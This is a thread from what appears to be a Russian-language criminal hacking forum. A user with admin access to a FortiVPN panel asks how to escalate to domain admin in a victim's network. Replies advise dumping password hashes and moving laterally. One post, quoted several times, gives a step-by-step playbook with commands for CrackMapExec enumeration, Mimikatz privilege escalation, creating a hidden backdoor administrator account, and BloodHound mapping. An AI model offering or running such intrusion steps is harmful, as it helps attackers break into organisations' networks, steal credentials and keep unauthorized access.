VPN форти впн

[weakem]

есть админка в фортивпн панеле, можно ли как то подняться в домене?

 

[grupenfurer]

есть админка в фортивпн панеле, можно ли как то подняться в домене?

от многих факторов зависит, можно ли там впн подключение организовать, будет ли доступ из под этого подключения куда то. В общем мало данных, чтоб сказать можно или нет

 

[weakem]

от многих факторов зависит, можно ли там впн подключение организовать, будет ли доступ из под этого подключения куда то. В общем мало данных, чтоб сказать можно или нет

впн есть, ЛА есть, до ДА как подняться не знаю

 

[grupenfurer]

впн есть, ЛА есть, до ДА как подняться не знаю

в админке в разделе лдап заполнено что-нибудь?

 

[weakem]

в админке в разделе лдап заполнено что-нибудь?

-

 

[Lawyer]

впн есть, ЛА есть, до ДА как подняться не знаю

Подключаешься к сетке ,снимаешь хеши с компов ищешь там DA

 

[Hronikmate]

А стоит ли игра свечей то? Какого качества доступ-то?

 

[almost]

впн есть, ЛА есть, до ДА как подняться не знаю

сними хеши. под хешами дальше скань. будет доступ на другую тачку. там хеши сними. продолжай до ДА

 

[BLUA]

А стоит ли игра свечей то? Какого качества доступ-то?

в мире иногда не всё за деньги, иногда опыт тоже нужен

 

[blacky]

1. Exploit Vulnerabilities:
   Example: Exploiting a known vulnerability in the FortiVPN admin panel.
   
   # example command to exploit a vulnerability
   exploit-fortivpn -u admin -p password -t fortivpn.example.com
   
   
2. Network Enumeration:
   Example: Using CrackMapExec to enumerate domain information after gaining access to the FortiVPN admin panel.
   
   # example command to enumerate domain information
   cme smb 192.168.1.1 -u admin -p password --users
   \
3. Exploiting Active Directory:
   Example: Attempting to exploit weak credentials discovered during network enumeration.
   
   # example command to exploit weak credentials
   crackmapexec smb 192.168.1.100 -u weakuser -p weakpassword --local
   
   
4. Privilege Escalation:
   Example: Using Mimikatz to escalate privileges on a compromised system within the domain.
   
   # example command to use Mimikatz for privilege escalation
   Invoke-Mimikatz -Command '"privilege::debug" "token::elevate"'
   
   
5. Persistence:
   Example: Creating a backdoor user account with administrative privileges.
   
   # example commands to create a backdoor user account
   net user backdooruser backdoorpassword /add
   net localgroup administrators backdooruser /add
   
   
6. Post-Exploitation Activities:
   Example: Using BloodHound to identify high-value targets within the domain.
   
   # example command to use BloodHound for post-exploitation activities
   bloodhound-python -u domainuser -p password -d domain.com -gc DomainController.domain.com

 

[BLUA]

1. Exploit Vulnerabilities:
   Example: Exploiting a known vulnerability in the FortiVPN admin panel.
   
   # example command to exploit a vulnerability
   exploit-fortivpn -u admin -p password -t fortivpn.example.com
   
   
2. Network Enumeration:
   Example: Using CrackMapExec to enumerate domain information after gaining access to the FortiVPN admin panel.
   
   # example command to enumerate domain information
   cme smb 192.168.1.1 -u admin -p password --users
   \
3. Exploiting Active Directory:
   Example: Attempting to exploit weak credentials discovered during network enumeration.
   
   # example command to exploit weak credentials
   crackmapexec smb 192.168.1.100 -u weakuser -p weakpassword --local
   
   
4. Privilege Escalation:
   Example: Using Mimikatz to escalate privileges on a compromised system within the domain.
   
   # example command to use Mimikatz for privilege escalation
   Invoke-Mimikatz -Command '"privilege::debug" "token::elevate"'
   
   
5. Persistence:
   Example: Creating a backdoor user account with administrative privileges.
   
   # example commands to create a backdoor user account
   net user backdooruser backdoorpassword /add
   net localgroup administrators backdooruser /add
   
   
6. Post-Exploitation Activities:
   Example: Using BloodHound to identify high-value targets within the domain.
   
   # example command to use BloodHound for post-exploitation activities
   bloodhound-python -u domainuser -p password -d domain.com -gc DomainController.domain.com

Бл№ чувак! У тебя ман лучше чем у бастерлорда оба вместе!

 

[Eleven]

Бл№ чувак! У тебя ман лучше чем у бастерлорда оба вместе!

Это не ман, а паблик инструменты если что) Если ты не знал как добавлять юзера, локал админа на тачку, юзать мимик, блудхаунд, крекмап, то видимо ты просто не вникал в тему работы по сети. Тут на форуме не раз расписано всё по этим тулзам +. По поводу манов басстера, то его маны довольно годные как для паблика

 

[HostBost]

Это не ман, а паблик инструменты если что)

 

[BLUA]

Это не ман, а паблик инструменты если что) Если ты не знал как добавлять юзера, локал админа на тачку, юзать мимик, блудхаунд, крекмап, то видимо ты просто не вникал в тему работы по сети. Тут на форуме не раз расписано всё по этим тулзам +. По поводу манов басстера, то его маны довольно годные как для паблика

ты юмора не понял просто

 

[Zalk]

1. Exploit Vulnerabilities:
   Example: Exploiting a known vulnerability in the FortiVPN admin panel.
   
   # example command to exploit a vulnerability
   exploit-fortivpn -u admin -p password -t fortivpn.example.com
   
   
2. Network Enumeration:
   Example: Using CrackMapExec to enumerate domain information after gaining access to the FortiVPN admin panel.
   
   # example command to enumerate domain information
   cme smb 192.168.1.1 -u admin -p password --users
   \
3. Exploiting Active Directory:
   Example: Attempting to exploit weak credentials discovered during network enumeration.
   
   # example command to exploit weak credentials
   crackmapexec smb 192.168.1.100 -u weakuser -p weakpassword --local
   
   
4. Privilege Escalation:
   Example: Using Mimikatz to escalate privileges on a compromised system within the domain.
   
   # example command to use Mimikatz for privilege escalation
   Invoke-Mimikatz -Command '"privilege::debug" "token::elevate"'
   
   
5. Persistence:
   Example: Creating a backdoor user account with administrative privileges.
   
   # example commands to create a backdoor user account
   net user backdooruser backdoorpassword /add
   net localgroup administrators backdooruser /add
   
   
6. Post-Exploitation Activities:
   Example: Using BloodHound to identify high-value targets within the domain.
   
   # example command to use BloodHound for post-exploitation activities
   bloodhound-python -u domainuser -p password -d domain.com -gc DomainController.domain.com

Подскажите кто нибудь, в чем смысл команд в которых нужно юзернейм и пароль вписывать? если есть логин и пароль это не называется что ты уже пробился? че за бред??? ТОли я Доб@k толи лыжи не едут!!!!

bloodhound-python -u domainuser -PASSWORD -d domain.com -gc DomainController.domain.com

 

[Krypt0n]

так если ЛА есть в чем проблема?